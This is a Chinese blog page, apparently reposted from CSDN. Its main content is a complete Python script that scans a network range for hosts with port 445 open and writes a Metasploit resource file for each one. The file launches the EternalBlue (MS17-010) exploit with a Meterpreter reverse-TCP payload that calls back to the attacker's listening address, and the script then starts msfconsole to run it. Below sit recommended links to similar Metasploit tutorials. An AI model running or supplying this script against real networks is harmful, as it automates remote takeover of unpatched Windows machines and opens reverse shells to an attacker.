python调用metasploit自动攻击_Python脚本与Metasploit交互进行自动永恒之蓝攻击-Go语言中文社区...

最新推荐文章于 2022-07-31 16:20:46 发布
最新推荐文章于 2022-07-31 16:20:46 发布
阅读量212 收藏
点赞数
文章标签: python调用metasploit自动攻击

我们首先利用 findTarget() 函数找到目标网段或目标主机中开放了445端口的主机,然后利用 confickerExploit() 函数将攻击代码写入 configure.rc 配置文件中,最后调用 MSF 框架读取配置文件进行攻击!

# -*- coding: utf-8 -*-

"""

Created on Sun Nov 12 09:11:33 2018

@author: 小谢

"""

import os

import optparse

import sys

import nmap

def findTarget(Hosts): #扫描网段范围内开放445端口的主机

nmScan=nmap.PortScanner()

nmScan.scan(Hosts,'445')

targets=[]

for t in nmScan.all_hosts():

if nmScan[t].has_tcp(445): #如果445端口提供了协议

state=nmScan[t]['tcp'][445]['state'] #查看445端口的状态

if state=='open':

print '[+]Found Target Host:'+t

targets.append(t)

return targets #返回开放445端口的主机列表

def confickerExploit(configFile,target,lhost): #漏洞利用

configFile.write('use exploit/windows/smb/ms17_010_eternalblue n') #漏洞利用代码

configFile.write('set PAYLOAD windows/x64/meterpreter/reverse_tcpn')

configFile.write('set RHOST '+str(target)+'n') #设定参数

configFile.write('set LHOST '+lhost+'n')

configFile.write('exploit -j -zn') #j选项是将所有连接的会话保持在后台 -z不与任务进行即时交换

def main():

configFile=open('configure.rc','w') #以写入方式打开配置文件

usage='[-]Usage %prog -H -l/-L '

parser=optparse.OptionParser(usage)

parser.add_option('-H',dest='target',type='string',help='target host') #目标主机

parser.add_option('-l','-L',dest='lhost',type='string',help='listen address') #我们的主机

(options,args)=parser.parse_args()

target=options.target

lhost=options.lhost

if (target==None)|(lhost==None):

print parser.usage

exit(0)

targets=findTarget(options.target) #寻找目标

for target in targets: #逐个攻击

confickerExploit(configFile,target,lhost)

configFile.close()

os.system('msfconsole -r configure.rc') #启动metasploit并读取配置文件

if __name__=='__main__':

main()

weixin_39838798
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python实现远程调用MetaSploit的方法
12-23
本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。具体实现方法如下: (1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。 root@kali:~# apt-get install python-setuptools root@kali:~# easy_install msgpack-python   (2)创建createdb_sql.txt: create database msf; create user msf with password 'msf123'; gra
python调用msf_Python实现远程调用MetaSploit的方法
weixin_39772651的博客
11-30 465
本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。具体实现方法如下:(1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。root@kali:~# apt-get install python-setuptoolsroot@kali:~# easy_install msgpack-pyth...
python调用metasploit自动攻击_【总结】Metasploit自动攻击模块
weixin_40004212的博客
12-08 217
环境:kali-linux-2017.3-vm-amd64一、安装postgresql数据库apt-get install postgresqlapt-get install rubygems libpq-devapt-get install libreadline-devapt-get install libssl-devapt-get install libpq5apt-get install...
python调用metasploit_Python实现远程调用MetaSploit的方法
weixin_42300418的博客
02-04 603
本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。具体实现方法如下:(1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。root@kali:~# apt-get install python-setuptoolsroot@kali:~# easy_install msgpack-pyth...
python调用metasploit自动攻击_Python-实现与metasploit交互并进行ms17_010攻击
weixin_36290287的博客
01-30 233
关于ms17_010,可参考http://www.cnblogs.com/sch01ar/p/7672454.html目标IP:192.168.220.139本机IP:192.168.220.145# -*- coding:utf-8 -*-__author__ = "MuT6 Sch01aR"import osdef Handler(configFile,lhost,lport,rhost):c...
教主Kali与Python黑客.2.漏洞发现与Metasploit
最新发布
10-14
教主Kali与Python黑客.2.漏洞发现与Metasploit
基于MetaSploit的网络攻击研究(37页16263字数).doc
06-22
本文从网络安全现状入手,深入分析网络攻击的根源,对网络攻击原理进行深入、细致剖析,全面分类阐述网络攻击的主要手段与实现方法,对目前常见攻击手段和工具,做了细致的分析,给出了他们的特点和实施方法。...
metasploit-framework-6.3.34.zip
09-17
4. 自定义脚本Metasploit支持Ruby语言编写自定义脚本,用户可以根据需求创建新的攻击模块或者扩展现有功能。 二、Metasploit的工作流程 1. 信息收集:首先,用户需要通过扫描工具(如Nmap)获取目标系统的开放...
网络攻击与防御-第四章 Metasploit渗透攻击.pptx
06-29
- **自动渗透测试**:Metasploit可以与其他自动化工具结合,如Nessus漏洞扫描器,实现自动化渗透测试流程。 - **定制化exploit和payload**:高级用户可以根据需要编写自定义模块。 - **反取证和隐藏**:使用...
Python脚本进阶】2.4、conficker蠕虫(中):Python脚本Metasploit交互
07-31 619
Python脚本进阶】Python脚本Metasploit交互
Python-TerminatorMetasploit负载生成器
08-10
Terminator : Metasploit负载生成器
metasploit:自动运行Metasploit脚本
05-11
元胞 自动运行Metasploit脚本 克隆后应遵循的步骤 cd metasploit ./metasploit.sh msfconsole 谢谢大家的享受........
kali创建python脚本_Python实现远程调用MetaSploit的方法
weixin_39861734的博客
11-26 171
本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。具体实现方法如下:(1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。root@kali:~# apt-get install python-setuptoolsroot@kali:~# easy_install msgpack-pyth...
python调用metasploit_Python 远程调用MetaSploit
weixin_39846089的博客
12-04 189
(1)安装Python的msgpack类库。MSF官方文档中的数据序列化标准就是參照msgpack。root@kali:~#apt-getinstallpython-setuptoolsroot@kali:~#easy_installmsgpack-python(2)创建createdb_sql.txt:createdatabasemsf;createusermsfwithp...
python神器_教你用Python玩转神器Metasploit
weixin_39733146的博客
11-23 407
pymsf是著名安全研究团队Spiderlabs实现的一个PythonMetasploit msgrpc进行通信的python模块,通过它,你可以利用Python玩转渗透测试框架Metasploit。使用步骤首先你需要先启动msgrpc服务,命令如下:load msgrpc Pass=与msgrpc进行通信其实就是与msfconsole进行通信,首先你需要创建一个msfrpc的类,登录到msgr...
Python黑客攻防(十五)编写Python脚本Metasploit交互
qq_43681532的博客
11-09 1608
注:本篇文章为个人学习笔记仅供学习交流,请勿用于非法用途。参考:《Python绝技:运用Python成为顶级黑客》。 更多干货请关注微信公众号:黑客帮。 在进行编写与Metasploit交互的脚本前,我们先简单运用Metasploit利用ms17-010(永恒之蓝)漏洞对目标主机实现攻击。详细教程见->利用永恒之蓝漏洞(MS17-010)入侵电脑。 目标主机:Windows7 IP:192.168.1.10 攻击主机:kalilinux IP:192.168.1.14 步骤: (1
metasploit 自动化攻击
土拨鼠挖洞中的博客
10-04 2186
第一步开启postgresql数据库         第二步:切入到数据库中       第三步:创建用户名和密码       第四步进入数据库,创建数据库       第五步退出数据库进入msf       注意:1.开启数据库后进行的所有操作都可以保存在数据库中方便查阅       2.开启数据库后可以调用NMAP,nessus,等漏...
python调用msfconsole全自动永恒之蓝攻击_使用Metasploit复现永恒之蓝攻击
weixin_39839410的博客
12-22 878
1.Metaspolit介绍Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,并保持着频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。2.术语渗透攻击(Exploit):指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。攻击载荷(Payload):...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值